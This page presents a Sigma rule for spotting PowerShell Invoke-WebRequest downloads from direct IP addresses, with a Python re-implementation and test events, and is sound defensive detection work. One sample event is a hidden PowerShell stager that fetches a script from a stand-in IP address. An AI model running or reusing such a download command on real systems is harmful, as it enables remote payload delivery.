Suspicious Invoke-WebRequest Execution With DirectIP
Detects PowerShell invocations of the Invoke-WebRequest cmdlet (or one of its aliases: iwr, curl, wget) where the target URL uses a direct IP address rather than a hostname
Sigma rule
title: Suspicious Invoke-WebRequest Execution With DirectIP
id: 1edff897-9146-48d2-9066-52e8d8f80a2f
status: test
description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
references:
    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-21
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_commands:
        CommandLine|contains:
            # These are all aliases of Invoke-WebRequest
            - 'curl '
            - 'Invoke-WebRequest'
            - 'iwr '
            - 'wget '
    selection_ip:
        # In case of FP with local IPs add additional filters
        CommandLine|contains:
            - '://1'
            - '://2'
            - '://3'
            - '://4'
            - '://5'
            - '://6'
            - '://7'
            - '://8'
            - '://9'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
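To see what the three selections actually match, here is the rule's detection logic re-implemented in Python and run over a handful of constructed process_creation events. This is an added example, not code from the rule author or from SigmaHQ. The match tokens are copied from the rule; the events, the `rule_matches_tuned` filter and the `PRIVATE_NETS` list are assumptions made for illustration (the filter is one way to act on the rule's own comment about false positives from local IPs, not part of the rule).

```python
import ipaddress
import re

# Match tokens taken from the rule above. Sigma's contains/endswith modifiers
# are case-insensitive by default, so tokens and fields are compared lowercased.
IMAGE_SUFFIXES = ("\\powershell.exe", "\\pwsh.exe")
ORIGINAL_FILENAMES = ("powershell.exe", "pwsh.dll")
COMMAND_TOKENS = ("curl ", "invoke-webrequest", "iwr ", "wget ")
IP_TOKENS = tuple("://" + d for d in "123456789")


def selection_img(event):
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith(IMAGE_SUFFIXES) or original in ORIGINAL_FILENAMES


def selection_commands(event):
    cmd = event.get("CommandLine", "").lower()
    return any(tok in cmd for tok in COMMAND_TOKENS)


def selection_ip(event):
    cmd = event.get("CommandLine", "").lower()
    return any(tok in cmd for tok in IP_TOKENS)


def rule_matches(event):
    """condition: all of selection_*"""
    return selection_img(event) and selection_commands(event) and selection_ip(event)


# --- Optional tuning (an assumption for illustration, not part of the rule) ---
# The rule's comment suggests extra filters if local IPs cause false positives.
# This variant keeps a hit only when the command line carries an IPv4 literal
# as a URL host that lies outside RFC 1918 and loopback space.
PRIVATE_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")
]
# Host portion after "://", up to the next '/', ':' (port), whitespace or quote.
_URL_HOST = re.compile(r"://([^/\s:'\"]+)")


def url_ipv4_hosts(cmdline):
    """Return IPv4 literals used as URL hosts; hostnames (even digit-leading ones) are skipped."""
    ips = []
    for host in _URL_HOST.findall(cmdline):
        try:
            ips.append(ipaddress.IPv4Address(host))
        except ipaddress.AddressValueError:
            continue
    return ips


def rule_matches_tuned(event):
    if not rule_matches(event):
        return False
    ips = url_ipv4_hosts(event.get("CommandLine", ""))
    return any(not any(ip in net for net in PRIVATE_NETS) for ip in ips)


# Constructed process_creation events (not real telemetry).
PS51 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS7 = r"C:\Program Files\PowerShell\7\pwsh.exe"
SAMPLE_EVENTS = {
    "stager_from_public_ip": {
        "Image": PS51, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": r'powershell.exe -nop -w hidden -c "iwr http://203.0.113.7/a.ps1 -OutFile C:\Users\Public\a.ps1"',
    },
    "hostname_only": {
        "Image": PS51, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": 'powershell.exe -c "Invoke-WebRequest https://www.example.com/ -UseBasicParsing"',
    },
    "not_powershell": {
        "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
        "CommandLine": "cmd.exe /c curl http://203.0.113.7/x.txt",
    },
    "pwsh_private_ip": {  # on pwsh 'curl' is curl.exe, not an alias; the rule still fires
        "Image": PS7, "OriginalFileName": "pwsh.dll",
        "CommandLine": r'"C:\Program Files\PowerShell\7\pwsh.exe" -c "curl http://10.0.0.5:8080/health"',
    },
    "digit_leading_hostname": {  # '://1' matches a hostname, not an IP
        "Image": PS51, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": 'powershell.exe -c "Invoke-WebRequest https://1password.com/"',
    },
    "no_download": {
        "Image": PS51, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": 'powershell.exe -c "Get-Process | Sort-Object CPU"',
    },
}


def evaluate(events=SAMPLE_EVENTS):
    """Map each event label to (rule_matches, rule_matches_tuned)."""
    return {label: (rule_matches(ev), rule_matches_tuned(ev)) for label, ev in events.items()}


if __name__ == "__main__":
    for label, (base, tuned) in evaluate().items():
        print(f"{label:24} rule={base!s:5} tuned={tuned}")
```

Two things the run makes visible. First, the `'://1'` to `'://9'` tokens fire on any URL host that starts with a digit, so every RFC 1918 address and digit-leading hostnames (the `1password.com` event) match as well, while `://0` and bracketed IPv6 literals are not covered at all; the tuned variant narrows this to genuine non-private IPv4 literals. Second, `curl` and `wget` are aliases of Invoke-WebRequest only in Windows PowerShell 5.1; PowerShell 6 and later removed them, so on pwsh those tokens catch the native curl.exe or wget being launched from a PowerShell command line, which is still worth seeing but is a different activity from the cmdlet named in the rule.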
Related rules
- AppX Package Installation Attempts Via AppInstaller.EXE
- Arbitrary File Download Via GfxDownloadWrapper.EXE
- Browser Execution In Headless Mode
- Cisco Stage Data
- Command Line Execution with Suspicious URL and AppData Strings